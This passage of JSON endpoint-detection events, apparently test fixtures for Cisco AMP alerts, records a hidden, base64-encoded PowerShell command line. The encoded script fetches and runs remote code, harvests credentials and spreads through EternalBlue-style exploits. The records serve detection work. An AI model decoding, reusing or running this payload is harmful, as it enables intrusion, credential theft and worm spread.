AG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20200719101800,"sig_rev":1},"detection":"apde:20200719101800","end_ts":1610640884,"engine":"apde","id":"cF3A8bacac","name":"PowerShell Download String","observables":{"file":[{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1},{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1}]},"remediated":false,"severity":"medium","silent":true,"start_ts":1610640884,"tactics":["TA0002","TA0005"],"techniques":["T1059"],"type":"activity","normalized":{"observables":{"file":{"name":["wmiprvse.exe","powershell.exe"],"path":["c:\\windows\\system32\\wbem","c:\\windows\\system32\\windowspowershell\\v1.0"]}},"name":"powershell download string"},"ts":1610640884},"tactics":["TA0002","TA0005"],"techniques":["T1059"]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":791000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"PowerShell Download String","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAc